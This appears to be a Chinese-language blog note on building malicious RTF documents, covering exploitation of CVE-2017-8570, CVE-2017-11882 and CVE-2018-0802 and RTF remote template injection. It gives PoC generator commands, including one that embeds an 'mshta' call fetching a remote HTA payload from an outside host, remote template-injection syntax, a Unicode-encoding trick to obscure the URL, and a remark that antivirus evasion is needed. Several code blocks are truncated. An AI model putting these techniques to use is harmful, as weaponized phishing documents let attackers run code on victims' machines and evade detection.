RTF 文档利用
0x01 介绍
感觉都是通过Office漏洞来进行相关利用。。
0x02 利用
CVE-2017-8570
详细漏洞分析参考:CVE-2017-8570首次公开的野外样本及漏洞分析
测试Payload:
1 | <?XML version="1.0"?> |
直接python生成poc即可。POC:https://github.com/rxwx/CVE-2017-8570
反弹shell方式可以在sct文件中加载hta、powershell命令等方式上线。
1 | python2 packager_composite_moniker.py -s test.sct -o test4.rtf |
CVE-2017-11882 & CVE-2018-0802
因为这两个都是公式编辑器漏洞所以就放在一起了。
CVE-2017-11882
详细漏洞分析可看【漏洞分析】CVE-2017-11882漏洞分析、利用及动态检测。该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出。该漏洞在当时通杀所有office版本。。
POC:https://github.com/Ridter/CVE-2017-11882
1 | python2 Command109b_CVE-2017-11882.py -c 'mshta http://172.16.1.181:8080/CLC3TT3WrvdG.hta' -o mshta.doc #也可直接生成rtf |
43b命令长度不能超过43 bytes,109b命令长度不能超过109 bytes
POC&Exploit:
https://github.com/Ridter/CVE-2017-11882
https://github.com/unamer/CVE-2017-11882/
https://github.com/Ridter/RTF_11882_0802
CVE-2018-0802
漏洞同样是发生在EQNEDT32.EXE进程,但是区别在于是拷贝字体FaceName时的栈溢出。详细分析: [原创]Office 0day(CVE-2018-0802与2017-11882)漏洞分析与利用。
POC:
https://github.com/rxwx/CVE-2018-0802
rtfobj分析
公式编辑器漏洞可直接被分析出特征
模版注入
模版注入算是比较新的攻击技术了,在2021年第一季度时被APT组织Donot利用。这里简单记录下制作模版注入RTF文件的方式。
新建一个RTF文档,随便输入点内容,然后用任意文本编辑器打开RTF文件。插入
1 | {\*\template htxp://127.0.0.1/teste} |
重新用word文档打开RTF文件。服务端收到请求
能够成功加载远程文档。
Unicode编码的模版注入
将开头的uc或uc2改成uc1
使用编码转换
1 | import sys |
使用生成的字段和普通的模版注入一样插入到rtf文档里面就行了。
1 | {\*\template \u-65432?\u-65420?\u-65420?\u-65424?\u-65478?\u-65489?\u-65489?\u-65487?\u-65481?\u-65486?\u-65490?\u-65487?\u-65482?\u-65490?\u-65487?\u-65490?\u-65482?\u-65486?\u-65489?\u-65438?\u-65490?\u-65436?\u-65425?\u-65437?\u-65427?} |
使用RTF模版注入结合CVE-2017-11882
按照上诉方法制作RTF文档和包含漏洞的DOC文档,然后其实就是改个文本而已。但是需要在漏洞利用的恶意文档中做免杀。
0x03 参考文章
- 深入了解在钓鱼攻击中被广泛使用的Microsoft RTF格式文件和OLE漏洞
- An Inside Look into Microsoft Rich Text Format and OLE Exploits
- 手段频出,疑似Donot组织利用RTF模板注入针对周边地区的攻击活动分析
- Office RTF远程模板注入
- Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
- Malicious Document: Cheatsheet and Note
- 【漏洞分析】CVE-2017-11882漏洞分析、利用及动态检测
- CVE-2017-11882 POC
- CVE-2017-11882-unmaer
- CVE-2017-8570 Microsoft Office 逻辑漏洞复现和利用
- CVE-2017-8570首次公开的野外样本及漏洞分析